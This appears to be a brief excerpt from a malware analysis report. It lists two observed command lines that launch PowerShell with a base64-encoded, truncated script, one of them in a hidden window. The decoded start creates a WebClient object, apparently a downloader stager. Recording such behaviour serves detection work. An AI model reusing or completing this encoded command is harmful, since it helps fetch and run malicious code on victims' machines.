Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAF8AMgA0ADQAMgBfADYAPQAoACcAcwAnACsAJwAxADQAOABfADEAJwApADsAJABJADgAXwBfADgAOAA5AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEwAXwA3ADkAMABfAF8AXwA9ACgAJwBoAH...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAF8AMgA0ADQAMgBfADYAPQAoACcAcwAnACsAJwAxADQAOABfADEAJwApADsAJABJADgAXwBfADgAOAA5AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEwAXwA3ADkAMABfAF8AXwA9ACgAJwBoAH...' (with hidden window)